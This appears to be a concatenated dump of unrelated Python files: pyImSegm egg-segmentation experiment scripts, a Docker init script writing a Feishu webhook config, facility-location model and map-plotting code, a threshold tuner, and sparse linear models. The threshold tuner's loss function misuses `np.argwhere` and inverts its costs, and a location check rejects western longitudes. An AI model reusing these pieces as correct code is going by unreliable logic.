# segm, phi, its = chanvese.chanvese(img, init_mask, alpha=0.2,
# max_its=nb_iter, thresh=0)
# segm = measure.label(segm)
# return segm, centers, None
def segment_fit_ellipse(seg, centers, fn_preproc_points,
thr_overlap=SEGM_OVERLAP):
""" segment eggs using ellipse fitting
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param fn_preproc_points: function for detection boundary points
:param float thr_overlap: threshold for removing overlapping segmentation
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
points_centers = fn_preproc_points(seg, centers)
centres_new, ell_params = [], []
segm = np.zeros_like(seg)
for i, points in enumerate(points_centers):
lb = i + 1
ellipse = EllipseModel()
ellipse.estimate(points)
if not ellipse:
continue
logging.debug('ellipse params: %r', ellipse.params)
segm = ell_fit.add_overlap_ellipse(segm, ellipse.params, lb, thr_overlap)
if np.any(segm == lb):
centres_new.append(centers[i])
ell_params.append(ellipse.params)
dict_export = {'ellipses.csv': pd.DataFrame(ell_params, columns=COLUMNS_ELLIPSE)}
return segm, np.array(centres_new), dict_export
def segment_fit_ellipse_ransac(seg, centers, fn_preproc_points, nb_inliers=0.6,
thr_overlap=SEGM_OVERLAP):
""" segment eggs using ellipse fitting and RANDSAC strategy
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param fn_preproc_points: function for detection boundary points
:param float nb_inliers: ratio of inliers for RANSAC
:param float thr_overlap: threshold for removing overlapping segmentations
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
points_centers = fn_preproc_points(seg, centers)
centres_new, ell_params = [], []
segm = np.zeros_like(seg)
for i, points in enumerate(points_centers):
lb = i + 1
nb_min = int(len(points) * nb_inliers)
ransac_model, _ = measure.ransac(points, EllipseModel,
min_samples=nb_min,
residual_threshold=15,
max_trials=250)
if not ransac_model:
continue
logging.debug('ellipse params: %r', ransac_model.params)
segm = ell_fit.add_overlap_ellipse(segm, ransac_model.params, lb,
thr_overlap)
if np.any(segm == lb):
centres_new.append(centers[i])
ell_params.append(ransac_model.params)
dict_export = {'ellipses.csv': pd.DataFrame(ell_params, columns=COLUMNS_ELLIPSE)}
return segm, np.array(centres_new), dict_export
def segment_fit_ellipse_ransac_segm(seg, centers, fn_preproc_points,
table_p, nb_inliers=0.35,
thr_overlap=SEGM_OVERLAP):
""" segment eggs using ellipse fitting and RANDSAC strategy on segmentation
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param fn_preproc_points: function for detection boundary points
:param [[float]] table_p: table of probabilities being foreground / background
:param float nb_inliers: ratio of inliers for RANSAC
:param float thr_overlap: threshold for removing overlapping segmentations
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
slic, points_all, labels = ell_fit.get_slic_points_labels(seg, slic_size=15,
slic_regul=0.1)
points_centers = fn_preproc_points(seg, centers)
weights = np.bincount(slic.ravel())
centres_new, ell_params = [], []
segm = np.zeros_like(seg)
for i, points in enumerate(points_centers):
lb = i + 1
ransac_model, _ = ell_fit.ransac_segm(points,
ell_fit.EllipseModelSegm,
points_all, weights,
labels, table_p,
min_samples=nb_inliers,
residual_threshold=25,
max_trials=250)
if not ransac_model:
continue
logging.debug('ellipse params: %r', ransac_model.params)
segm = ell_fit.add_overlap_ellipse(segm, ransac_model.params, lb,
thr_overlap)
if np.any(segm == lb):
centres_new.append(centers[i])
ell_params.append(ransac_model.params)
dict_export = {'ellipses.csv': pd.DataFrame(ell_params, columns=COLUMNS_ELLIPSE)}
return segm, np.array(centres_new), dict_export
def segment_graphcut_pixels(seg, centers, labels_fg_prob, gc_regul=1.,
seed_size=10, coef_shape=0.,
shape_mean_std=(50., 10.)):
""" wrapper for segment global GraphCut optimisations
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param labels_fg_prob:
:param float gc_regul:
:param int seed_size:
:param float coef_shape:
:param (float, float) shape_mean_std:
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
segm_obj = seg_rg.object_segmentation_graphcut_pixels(
seg, centers, labels_fg_prob, gc_regul, seed_size, coef_shape,
shape_mean_std=shape_mean_std)
return segm_obj, centers, None
def segment_graphcut_slic(slic, seg, centers, labels_fg_prob, gc_regul=1.,
multi_seed=True, coef_shape=0., edge_weight=1.,
shape_mean_std=(50., 10.)):
""" wrapper for segment global GraphCut optimisations on superpixels
:param ndarray slic:
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param labels_fg_prob:
:param float gc_regul:
:param bool multi_seed:
:param float coef_shape:
:param float edge_weight:
:param shape_mean_std:
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
gc_labels = seg_rg.object_segmentation_graphcut_slic(
slic, seg, centers, labels_fg_prob, gc_regul, edge_weight,
add_neighbours=multi_seed, coef_shape=coef_shape,
shape_mean_std=shape_mean_std)
segm_obj = np.array(gc_labels)[slic]
return segm_obj, centers, None
def segment_rg2sp_greedy(slic, seg, centers, labels_fg_prob, path_model,
coef_shape, coef_pairwise=5, allow_obj_swap=True,
prob_label_trans=(0.1, 0.03),
dict_thresholds=RG2SP_THRESHOLDS, debug_export=''):
""" wrapper for region growing method with some debug exporting """
if os.path.splitext(path_model)[-1] == '.npz':
shape_model = np.load(path_model)
else:
shape_model = pickle.load(open(path_model, 'rb'))
dict_debug = dict() if os.path.isdir(debug_export) else None
slic_prob_fg = seg_rg.compute_segm_prob_fg(slic, seg, labels_fg_prob)
labels_greedy = seg_rg.region_growing_shape_slic_greedy(
slic, slic_prob_fg, centers, (shape_model['mix_model'], shape_model['cdfs']),
shape_model['name'], coef_shape=coef_shape, coef_pairwise=coef_pairwise,
prob_label_trans=prob_label_trans, greedy_tol=1e-1, allow_obj_swap=allow_obj_swap,
dict_thresholds=dict_thresholds, nb_iter=1000, debug_history=dict_debug)
if dict_debug is not None:
nb_iter = len(dict_debug['energy'])
for i in range(nb_iter):
fig = tl_visu.figure_rg2sp_debug_complete(seg, slic, dict_debug, i)
fig.savefig(os.path.join(debug_export, 'iter_%03d' % i))
plt.close(fig)
segm_obj = labels_greedy[slic]
return segm_obj, centers, None
def segment_rg2sp_graphcut(slic, seg, centers, labels_fg_prob, path_model,
coef_shape, coef_pairwise=5, allow_obj_swap=True,
prob_label_trans=(0.1, 0.03),
dict_thresholds=RG2SP_THRESHOLDS, debug_export=''):
""" wrapper for region growing method with some debug exporting """
if os.path.splitext(path_model)[-1] == '.npz':
shape_model = np.load(path_model)
else:
shape_model = pickle.load(open(path_model, 'rb'))
dict_debug = dict() if os.path.isdir(debug_export) else None
slic_prob_fg = seg_rg.compute_segm_prob_fg(slic, seg, labels_fg_prob)
labels_gc = seg_rg.region_growing_shape_slic_graphcut(
slic, slic_prob_fg, centers, (shape_model['mix_model'], shape_model['cdfs']),
shape_model['name'], coef_shape=coef_shape, coef_pairwise=coef_pairwise,
prob_label_trans=prob_label_trans, optim_global=True, allow_obj_swap=allow_obj_swap,
dict_thresholds=dict_thresholds, nb_iter=250, debug_history=dict_debug)
if dict_debug is not None:
nb_iter = len(dict_debug['energy'])
for i in range(nb_iter):
fig = tl_visu.figure_rg2sp_debug_complete(seg, slic, dict_debug, i)
fig.savefig(os.path.join(debug_export, 'iter_%03d' % i))
plt.close(fig)
segm_obj = labels_gc[slic]
return segm_obj, centers, None
def simplify_segm_3cls(seg, lut=(0., 0.8, 1.), smooth=True):
""" simple segmentation into 3 classes
:param ndarray seg: input image / segmentation
:param [float] lut:
:param bool smooth:
:return ndarray:
"""
segm = seg.copy()
segm[seg > 1] = 2
if np.sum(seg > 0) > 0:
seg_filled = ndimage.morphology.binary_fill_holes(seg > 0)
segm[np.logical_and(seg == 0, seg_filled)] = 2
segm = np.array(lut)[segm]
if smooth:
segm = ndimage.filters.gaussian_filter(segm, 5)
return segm
def create_dict_segmentation(params, slic, segm, img, centers):
""" create dictionary of segmentation function hash, function and parameters
:param dict params:
:param ndarray slic:
:param ndarray segm:
:param [[float]] centers:
:return {str: (function, (...))}:
"""
# parameters for Region Growing
params_rg_single = (slic, segm, centers, params['tab-proba_RG2SP'],
params['path_single-model'], params['RG2SP-shape'],
params['RG2SP-pairwise'], params['RG2SP-swap'],
params['label_trans'], params['RG2SP_theshold'])
params_rg_multi = (slic, segm, centers, params['tab-proba_RG2SP'],
params['path_multi-models'], params['RG2SP-shape'],
params['RG2SP-pairwise'], params['RG2SP-swap'],
params['label_trans'], params['RG2SP_theshold'])
tab_proba_gc = params['tab-proba_graphcut']
gc_regul_px = params['gc-pixel_regul']
gc_regul_slic = params['gc-slic_regul']
seg_simple = simplify_segm_3cls(segm) if segm is not None else None
dict_segment = {
'ellipse_moments': (segment_fit_ellipse,
(segm, centers,
ell_fit.prepare_boundary_points_ray_dist)),
'ellipse_ransac_mmt': (segment_fit_ellipse_ransac,
(segm, centers,
ell_fit.prepare_boundary_points_ray_dist)),
'ellipse_ransac_crit': (segment_fit_ellipse_ransac_segm,
(segm, centers,
ell_fit.prepare_boundary_points_ray_edge,
params['tab-proba_ellipse'])),
'ellipse_ransac_crit2': (segment_fit_ellipse_ransac_segm,
(segm, centers,
ell_fit.prepare_boundary_points_ray_join,
params['tab-proba_ellipse'])),
'ellipse_ransac_crit3': (segment_fit_ellipse_ransac_segm,
(segm, centers,
ell_fit.prepare_boundary_points_ray_mean,
params['tab-proba_ellipse'])),
'GC_pixels-small': (segment_graphcut_pixels,
(segm, centers, tab_proba_gc, gc_regul_px, 10)),
'GC_pixels-large': (segment_graphcut_pixels,
(segm, centers, tab_proba_gc, gc_regul_px, 30)),
'GC_pixels-shape': (segment_graphcut_pixels, (segm, centers,
tab_proba_gc, gc_regul_px, 10, 0.1)),
'GC_slic-small': (segment_graphcut_slic, (slic, segm, centers,
tab_proba_gc, gc_regul_slic, False)),
'GC_slic-large': (segment_graphcut_slic, (slic, segm, centers,
tab_proba_gc, gc_regul_slic, True)),
'GC_slic-shape': (segment_graphcut_slic,
(slic, segm, centers, tab_proba_gc, 1., False, 0.1)),
'RG2SP_greedy-single': (segment_rg2sp_greedy, params_rg_single),
'RG2SP_greedy-mixture': (segment_rg2sp_greedy, params_rg_multi),
'RG2SP_GC-single': (segment_rg2sp_graphcut, params_rg_single),
'RG2SP_GC-mixture': (segment_rg2sp_graphcut, params_rg_multi),
'watershed': (segment_watershed, (segm, centers)),
'watershed_morph': (segment_watershed, (segm, centers, True)),
# NOTE, this method takes to long for run in CI
'morph-snakes_seg': (segment_morphsnakes,
(seg_simple, centers, True, 3, [2, 1])),
'morph-snakes_img': (segment_morphsnakes, (img, centers)),
}
if params['methods'] is not None:
params['methods'] = [n.lower() for n in params['methods']]
dict_segment_filter = {n: dict_segment[n] for n in dict_segment
if n.lower() in params['methods']}
else:
dict_segment_filter = dict_segment
return dict_segment_filter
def image_segmentation(idx_row, params, debug_export=DEBUG_EXPORT):
""" image segmentation which prepare inputs (imsegm, centres)
and perform segmentation of various imsegm methods
:param (int, str) idx_row: input image and centres
:param dict params: segmentation parameters
:return str: image name
"""
_, row_path = idx_row
for k in dict(row_path):
if isinstance(k, str) and k.startswith('path_'):
row_path[k] = tl_data.update_path(row_path[k], absolute=True)
logging.debug('segmenting image: "%s"', row_path['path_image'])
name = os.path.splitext(os.path.basename(row_path['path_image']))[0]
img = load_image(row_path['path_image'])
# make the image like RGB
img_rgb = np.rollaxis(np.tile(img, (3, 1, 1)), 0, 3)
seg = load_image(row_path['path_segm'], 'segm')
assert img_rgb.shape[:2] == seg.shape, \
'image %r and segm %r do not match' % (img_rgb.shape[:2], seg.shape)
if not os.path.isfile(row_path['path_centers']):
logging.warning('no center was detected for "%s"', name)
return name
centers = tl_data.load_landmarks_csv(row_path['path_centers'])
centers = tl_data.swap_coord_x_y(centers)
if not list(centers):
logging.warning('no center was detected for "%s"', name)
return name
# img = seg / float(seg.max())
slic = seg_spx.segment_slic_img2d(img_rgb, sp_size=params['slic_size'],
relative_compact=params['slic_regul'])
path_segm = os.path.join(params['path_exp'], 'input', name + '.png')
export_draw_image_segm(path_segm, img_rgb, segm_obj=seg, centers=centers)
seg_simple = simplify_segm_3cls(seg)
path_segm = os.path.join(params['path_exp'], 'simple', name + '.png')
export_draw_image_segm(path_segm, seg_simple - 1.)
dict_segment = create_dict_segmentation(params, slic, seg, img, centers)
image_name = name + '.png'
centre_name = name + '.csv'
# iterate over segmentation methods and perform segmentation on this image
for method in dict_segment:
(fn, args) = dict_segment[method]
logging.debug(' -> %s on "%s"', method, name)
path_dir = os.path.join(params['path_exp'], method) # n.split('_')[0]
path_segm = os.path.join(path_dir, image_name)
path_centre = os.path.join(path_dir + DIR_CENTRE_POSIX, centre_name)
path_fig = os.path.join(path_dir + DIR_VISUAL_POSIX, image_name)
path_debug = os.path.join(path_dir + DIR_DEBUG_POSIX, name)
# assuming that segmentation may fail
try:
t = time.time()
if debug_export and 'rg2sp' in method:
os.mkdir(path_debug)
segm_obj, centers, dict_export = fn(*args,
debug_export=path_debug)
else:
segm_obj, centers, dict_export = fn(*args)
# also export ellipse params here or inside the segm fn
if dict_export is not None:
for k in dict_export:
export_partial(k, dict_export[k], path_dir, name)
logging.info('running time of %r on image "%s" is %d s',
fn.__name__, image_name, time.time() - t)
tl_data.io_imsave(path_segm, segm_obj.astype(np.uint8))
export_draw_image_segm(path_fig, img_rgb, seg, segm_obj, centers)
# export also centers
centers = tl_data.swap_coord_x_y(centers)
tl_data.save_landmarks_csv(path_centre, centers)
except Exception:
logging.exception('segment fail for "%s" via %s', name, method)
return name
def export_partial(str_key, obj_content, path_dir, name):
key, ext = os.path.splitext(str_key)
path_out = os.path.join(path_dir + '___%s' % key)
if not os.path.isdir(path_out):
os.mkdir(path_out)
path_file = os.path.join(path_out, name + ext)
if ext.endswith('.csv'):
obj_content.to_csv(path_file)
return path_file
def main(params, debug_export=DEBUG_EXPORT):
""" the main entry point
:param dict params: segmentation parameters
:param bool debug_export: whether export visualisations
"""
logging.getLogger().setLevel(logging.DEBUG)
params = tl_expt.create_experiment_folder(params, dir_name=NAME_EXPERIMENT,
stamp_unique=EACH_UNIQUE_EXPERIMENT)
tl_expt.set_experiment_logger(params['path_exp'])
logging.info(tl_expt.string_dict(params, desc='PARAMETERS'))
# tl_expt.create_subfolders(params['path_exp'], [FOLDER_IMAGE])
df_paths = pd.read_csv(params['path_list'], index_col=0)
logging.info('loaded %i items with columns: %r', len(df_paths),
df_paths.columns.tolist())
df_paths.dropna(how='any', inplace=True)
# create sub-folders if required
tl_expt.create_subfolders(params['path_exp'], ['input', 'simple'])
dict_segment = create_dict_segmentation(params, None, None, None, None)
dirs_center = [n + DIR_CENTRE_POSIX for n in dict_segment]
dirs_visu = [n + DIR_VISUAL_POSIX for n in dict_segment]
tl_expt.create_subfolders(params['path_exp'],
[n for n in dict_segment] + dirs_center + dirs_visu)
if debug_export:
list_dirs = [n + DIR_DEBUG_POSIX for n in dict_segment if 'rg2sp' in n]
tl_expt.create_subfolders(params['path_exp'], list_dirs)
_wrapper_segment = partial(image_segmentation, params=params)
iterate = tl_expt.WrapExecuteSequence(_wrapper_segment, df_paths.iterrows(),
nb_workers=params['nb_workers'])
list(iterate)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
logging.info('running...')
params = arg_parse_params(SEGM_PARAMS)
main(params)
logging.info('DONE')
```
#### File: pyImSegm/experiments_ovary_detect/run_RG2Sp_estim_shape-models.py
```python
import os
import sys
import glob
import logging
import pickle
import argparse
import numpy as np
import pandas as pd
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
import imsegm.utilities.data_io as tl_data
import imsegm.region_growing as tl_rg
PATH_DATA = tl_data.update_path('data_images', absolute=True)
PATH_IMAGES = os.path.join(tl_data.update_path('data_images'), 'drosophila_ovary_slice')
PATH_ANNOT = os.path.join(PATH_IMAGES, 'annot_eggs', '*.png')
RAY_STEP = 10
# names of default files for models
NAME_CSV_RAY_ALL = 'eggs_ray-shapes.csv'
NAME_PKL_MODEL_SINGLE = 'RG2SP_eggs_single-model.pkl'
NAME_PKL_MODEL_MIXTURE = 'RG2SP_eggs_mixture-model.pkl'
NAME_NPZ_MODEL_SINGLE = 'RG2SP_eggs_single-model.npz'
NAME_NPZ_MODEL_MIXTURE = 'RG2SP_eggs_mixture-model.npz'
def arg_parse_params():
"""
SEE: https://docs.python.org/3/library/argparse.html
:return {str: str}:
"""
parser = argparse.ArgumentParser()
parser.add_argument('-annot', '--path_annot', type=str, required=False,
help='path to directory & name pattern for annotations',
default=PATH_ANNOT)
parser.add_argument('-out', '--path_out', type=str, required=False,
help='path to the output directory', default=PATH_DATA)
parser.add_argument('-nb', '--nb_comp', type=int, required=False,
help='number of component in Mixture model', default=2)
params = vars(parser.parse_args())
for k in (k for k in params if 'path' in k):
params[k] = tl_data.update_path(params[k], absolute=True)
p = os.path.dirname(params[k]) if k == 'path_annot' else params[k]
assert os.path.exists(p), 'missing: %s' % p
# load saved configuration
logging.info('ARG PARAMETERS: \n %r', params)
return params
def main(path_annot, path_out, nb_comp=5):
list_paths = sorted(glob.glob(path_annot))
logging.info('nb images: %i SAMPLES: %r', len(list_paths),
[os.path.basename(p) for p in list_paths[:5]])
list_segms = []
for path_seg in list_paths:
seg = tl_data.io_imread(path_seg)
list_segms.append(seg)
list_rays, _ = tl_rg.compute_object_shapes(list_segms, ray_step=RAY_STEP,
interp_order='spline',
smooth_coef=1)
logging.info('nb eggs: %i, nb rays: %i', len(list_rays), len(list_rays[0]))
x_axis = np.linspace(0, 360, len(list_rays[0]), endpoint=False)
df = pd.DataFrame(np.array(list_rays), columns=x_axis.astype(int))
path_csv = os.path.join(path_out, NAME_CSV_RAY_ALL)
logging.info('exporting all Rays: %s', path_csv)
df.to_csv(path_csv)
# SINGLE MODEL
model, list_cdf = tl_rg.transform_rays_model_cdf_mixture(list_rays, 1)
cdf = np.array(np.array(list_cdf))
# path_model = os.path.join(path_out, NAME_NPZ_MODEL_SINGLE)
# logging.info('exporting model: %s', path_model)
# np.savez(path_model, name='cdf', cdfs=cdf, mix_model=model)
path_model = os.path.join(path_out, NAME_PKL_MODEL_SINGLE)
logging.info('exporting model: %s', path_model)
with open(path_model, 'wb') as fp:
pickle.dump({'name': 'cdf',
'cdfs': cdf,
'mix_model': model}, fp)
# MIXTURE MODEL
model, list_mean_cdf = tl_rg.transform_rays_model_sets_mean_cdf_mixture(
list_rays, nb_comp)
# path_model = os.path.join(path_out, NAME_NPZ_MODEL_MIXTURE)
# logging.info('exporting model: %s', path_model)
# np.savez(path_model, name='set_cdfs', cdfs=list_mean_cdf,
# mix_model=model)
path_model = os.path.join(path_out, NAME_PKL_MODEL_MIXTURE)
logging.info('exporting model: %s', path_model)
with open(path_model, 'wb') as fp:
pickle.dump({'name': 'set_cdfs',
'cdfs': list_mean_cdf,
'mix_model': model}, fp)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
logging.info('running...')
params = arg_parse_params()
main(params['path_annot'], params['path_out'], params['nb_comp'])
logging.info('Done')
``` |
{
"source": "jiuzhou-zhao/dockers",
"score": 2
} |
#### File: dockers/scripts/init_prometheus_alert_manager_webhook_feishu.py
```python
import os
def pre_init(data_root, image, docker_vars):
with open(os.path.join(data_root, 'config.yml'), 'w') as file_writer:
file_writer.write('''
bots:
webhook: # webhook 是 group name
url: ''' + docker_vars['FEISHU_WEBHOOK'] + '''
metadata:
"链接地址": "https://www.baidu.com"
''')
def post_init(data_root, image, docker_vars):
pass
``` |
{
"source": "JivanAmara/test_utils",
"score": 3
} |
#### File: test_utils/regression_test_utils/regression_test_utils.py
```python
import jsonpickle, logging
# PythonDecorators/my_decorator.py
class log_test_case(object):
""" @brief: Decorator to log input & output of a method as a jsonpickle'd tuple for easy
test creation.
Format of the tuple is (<method name>, <args (without self)>, <kwargs>, <result>)
@author: Jivan
@since: 2015-07-29
@change: 2015-08-03 by Jivan: Added class_name to initialization & logged output.
"""
def __init__(self, logger, class_name):
self.logger = logger
self.class_name = class_name
def __call__(self, f):
method_name = f.__name__
logger = self.logger
def wrapped_f(*args, **kwargs):
result = f(*args, **kwargs)
if logger.getEffectiveLevel() <= logging.DEBUG:
args_wo_instance = args[1:]
tc = repr(jsonpickle.encode(
(method_name, args_wo_instance, kwargs, result), keys=True
)
)
logger.debug('Decorator TestCase for "{}.{}":\n\t{}'\
.format(self.class_name, method_name, tc))
return result
return wrapped_f
``` |
{
"source": "jivanhoe/flop",
"score": 3
} |
#### File: flop/model/base.py
```python
from __future__ import annotations
from dataclasses import dataclass
from typing import List, Optional, Tuple
import numpy as np
import pandas as pd
from haversine import haversine
from mip import OptimizationStatus, ProgressLog
@dataclass
class Location:
lat: float
lon: float
def __post_init__(self):
if abs(self.lat) > 90:
raise ValueError
if not (180 >= self.lon >= 0):
raise ValueError
def to_tuple(self) -> Tuple[float, float]:
return self.lat, self.lon
def distance(self, other: Location) -> float:
return haversine(point1=self.to_tuple(), point2=other.to_tuple())
@dataclass
class FacilityCandidate:
name: str
location: Location
cost_variable: float
cost_fixed: float
capacity_max: float
capacity_min: float = 0.
def __post_init__(self):
if self.cost_variable < 0:
raise ValueError
if self.cost_fixed < 0:
raise ValueError
if not (self.capacity_max >= self.capacity_min >= 0):
raise ValueError
def __hash__(self):
return self.name
@dataclass
class DemandCentre:
name: str
location: Location
demand_variable: Optional[np.ndarray] = None
demand_fixed: float = 0.
def __post_init__(self):
if self.demand_variable is not None:
if not (1 <= len(self.demand_variable.shape) <= 2):
raise ValueError
if self.demand_variable.min() < 0:
raise ValueError
if self.n_periods <= 1:
raise ValueError
if self.demand_fixed is not None:
if self.demand_fixed < 0:
raise ValueError
else:
if self.demand_fixed is None:
raise ValueError
if self.demand_fixed < 0:
raise ValueError
@property
def demand(self) -> np.ndarray:
return (
(np.array([self.demand_fixed]) if self.demand_fixed is not None else 0)
+ (self.demand_variable if self.demand_variable is not None else 0)
)
@property
def n_periods(self) -> int:
if self.demand_variable is not None:
return self.demand_variable.shape[0]
return 1
@property
def n_samples(self) -> int:
if self.demand_variable is not None:
return self.demand_variable.shape[1]
return 0
def __hash__(self):
return self.name
@dataclass
class Problem:
facility_candidates: List[FacilityCandidate]
demand_centers: List[DemandCentre]
cost_transport: float
cost_unmet_demand: Optional[float] = None
discount_factor: float = 1.
def __post_init__(self):
if (
len(set(facility_candidate.name for facility_candidate in self.facility_candidates))
!= len(self.facility_candidates)
):
raise ValueError
if (
len(set(demand_center.name for demand_center in self.demand_centers))
!= len(self.demand_centers)
):
raise ValueError
if len(set(
demand_center.n_periods for demand_center in self.demand_centers
if demand_center.demand_variable is not None
)) != 1:
raise ValueError
if self.cost_transport < 0:
raise ValueError
if self.cost_unmet_demand is not None:
if self.cost_unmet_demand <= 0:
raise ValueError
if not(1 >= self.discount_factor >= 0):
raise ValueError
def compute_distances(self) -> np.ndarray:
distances = np.full(shape=(len(self.facility_candidates), len(self.demand_centers)), fill_value=np.nan)
for i, facility_candidate in enumerate(self.facility_candidates):
for j, demand_center in enumerate(self.demand_centers):
distances[i, j] = facility_candidate.location.distance(other=demand_center.location)
return distances
@property
def n_periods(self) -> int:
for demand_center in self.demand_centers:
if demand_center.demand_variable is not None:
return demand_center.n_periods
return 1
@dataclass
class SolveInfo:
status: OptimizationStatus
progress_log: ProgressLog
gap: float
def __post_init__(self):
if self.gap < 0:
raise ValueError
@dataclass
class Result:
facilities: pd.DataFrame
schedule: pd.DataFrame
unmet_demand: pd.DataFrame
solve_info: SolveInfo
def __post_init__(self):
pass
```
#### File: flop/utils/plotting.py
```python
import folium
import numpy as np
from flop.model.base import Problem, Result, Location
from typing import Optional
def get_map_centre(data: Problem) -> Location:
return Location(
lat=np.mean(
[facility_candidate.location.lat for facility_candidate in data.facility_candidates]
+ [demand_center.location.lat for demand_center in data.demand_centers]
),
lon=np.mean(
[facility_candidate.location.lon for facility_candidate in data.facility_candidates]
+ [demand_center.location.lon for demand_center in data.demand_centers]
)
)
def make_map(data: Problem) -> folium.Map:
return folium.Map(location=get_map_centre(data=data).to_tuple(), zoom_start=7)
def add_demand_centres_to_map(m: folium.Map, data: Problem, solution: Optional[Result] = None) -> None:
for demand_center in data.demand_centers:
popup_text = (
f"Name: {demand_center.name}<br>"
f"Average demand: {round(demand_center.demand.mean())}"
)
if solution is not None and data.cost_unmet_demand is not None:
info = solution.unmet_demand.loc[demand_center.name]
popup_text += f"<br>Average unmet demand: {round(info['unmet_demand'].mean())}"
folium.Marker(
location=demand_center.location.to_tuple(),
popup=folium.Popup(popup_text, max_width=1000),
icon=folium.Icon(color="orange", icon="building", prefix="fa"),
).add_to(m)
def add_facilities_to_map(
m: folium.Map,
data: Problem,
solution: Optional[Result] = None,
show_unused_facilities: bool = True
) -> None:
for facility in data.facility_candidates:
popup_text = f"Name: {facility.name}<br>"
if solution is not None:
info = solution.facilities.loc[facility.name]
if info["used"]:
color = "green"
popup_text += (
f"Capacity: {round(info['capacity'])}<br>"
f"Status: USED<br>"
f"Cost: {round(info['capex_per_period'])}"
)
else:
if not show_unused_facilities:
continue
color = "gray"
popup_text += f"Status: UNUSED"
else:
color = "blue"
popup_text += (
f"Capacity range: {round(facility.capacity_min)}-{round(facility.capacity_max)}<br>"
f"Fixed cost: {round(facility.cost_fixed)}<br>"
f"Variable cost: {round(facility.cost_variable)}"
)
folium.Marker(
location=facility.location.to_tuple(),
popup=folium.Popup(popup_text, max_width=1000),
icon=folium.Icon(color=color, icon="industry", prefix="fa"),
).add_to(m)
def add_supply_routes_to_map(m: folium.Map, data: Problem, solution: Result) -> None:
for facility in data.facility_candidates:
for demand_center in data.demand_centers:
supply = solution.schedule.loc[facility.name, demand_center.name]["supply"]
if (supply > 0).any():
folium.PolyLine(
locations=[
facility.location.to_tuple(),
demand_center.location.to_tuple()
],
popup=folium.Popup(f"Average supply: {round(supply.mean())}", max_width=1000),
opacity=0.75
).add_to(m)
def plot_problem(data: Problem) -> folium.Map:
m = make_map(data=data)
add_demand_centres_to_map(m=m, data=data)
add_facilities_to_map(m=m, data=data)
return m
def plot_solution(data: Problem, solution: Result, show_unused_facilities: bool = True) -> folium.Map:
m = make_map(data=data)
add_demand_centres_to_map(m=m, data=data, solution=solution)
add_facilities_to_map(m=m, data=data, solution=solution, show_unused_facilities=show_unused_facilities)
add_supply_routes_to_map(m=m, data=data, solution=solution)
return m
def plot_costs(solution: Result):
solution.schedule.plot.bar()
``` |
{
"source": "jivanhoe/haystack",
"score": 3
} |
#### File: src/haystack/threshold_tuner.py
```python
import numpy as np
from haystack.optimal_sampling_classifier import OptimalSamplingClassifier
class ThresholdTuner(OptimalSamplingClassifier):
def fit(self, X: np.ndarray, y: np.ndarray) -> None:
self.base_estimator.fit(X=X, y=y)
self._threshold = None
super().fit(X=X, y=y)
def _fit_parameters(self, X: np.ndarray, y: np.ndarray) -> None:
predicted_proba = np.unique(self.predict_proba(X=X)[:, 1])
loss = []
for threshold in predicted_proba:
self._threshold = threshold
loss.append(self._compute_loss(X=X, y=y).mean())
return predicted_proba[np.argmin(loss)]
def predict(self, X: np.ndarray) -> np.ndarray:
return np.where(self.predict_proba(X=X)[:, 1] > self.threshold, self.minority_class, self.majority_class)
def _compute_loss(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
return (
(self.predict(X=X) == y)
* np.argwhere(y == self.minority_class, self.false_negative_cost, self.false_positive_cost)
)
@property
def threshold(self) -> float:
return self._threshold
``` |
{
"source": "jivanhoe/sparsely",
"score": 3
} |
#### File: src/sparsely/sparse_linear_classifier.py
```python
from typing import Optional
import numpy as np
from sklearn.base import ClassifierMixin
from sklearn.linear_model import LogisticRegression
from sparsely.base import BaseSparseLinearModel
class SparseLinearClassifier(BaseSparseLinearModel, ClassifierMixin):
def __init__(
self,
max_selected_features: int,
l2_penalty: float = 0.1,
rescale: bool = True,
max_iter: int = 100,
convergence_tol: float = 1e-5,
max_seconds_per_cut: Optional[int] = None,
random_state: Optional[int] = None,
verbose: bool = False
):
super().__init__(
max_selected_features=max_selected_features,
l2_penalty=l2_penalty,
rescale=rescale,
max_iter=max_iter,
convergence_tol=convergence_tol,
max_seconds_per_cut=max_seconds_per_cut,
random_state=random_state,
verbose=verbose
)
def _initialize_support(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
return np.isin(
np.arange(self.n_features_in_),
np.argsort(
-np.abs(
LogisticRegression(
C=2 * self.max_selected_features / len(X) / self.l2_penalty
).fit(X=X, y=y).coef_
)
)[:self.max_selected_features]
)
def _compute_weights_for_subset(self, X_subset: np.ndarray, y: np.ndarray) -> np.ndarray:
return LogisticRegression(
C=2 * self.max_selected_features / X_subset.shape[0] / self.l2_penalty
).fit(X=X_subset, y=y).coef_.flatten()
def _compute_dual_variables(self, X_subset: np.ndarray, y: np.ndarray, weights_subset: np.ndarray) -> np.ndarray:
return -y / (1 + np.exp(y * np.matmul(X_subset, weights_subset)))
def _compute_objective_value(self, X_subset: np.ndarray, y: np.ndarray, dual_variables: np.ndarray) -> float:
return (
(
y * dual_variables * np.log(-y * dual_variables)
- (1 + y * dual_variables) * np.log(1 + y * dual_variables)
).sum()
- self.max_selected_features / np.sqrt(X_subset.shape[0]) / self.l2_penalty
* (np.matmul(X_subset.T, dual_variables) ** 2).sum()
)
```
#### File: src/sparsely/sparse_linear_regressor.py
```python
from typing import Optional
import numpy as np
from sklearn.base import RegressorMixin
from sklearn.linear_model import Ridge
from sparsely.base import BaseSparseLinearModel
class SparseLinearRegressor(BaseSparseLinearModel, RegressorMixin):
def __init__(
self,
max_selected_features: int,
l2_penalty: float = 0.1,
rescale: bool = True,
max_iter: int = 100,
convergence_tol: float = 1e-5,
max_seconds_per_cut: Optional[int] = None,
random_state: Optional[int] = None,
verbose: bool = False
):
super().__init__(
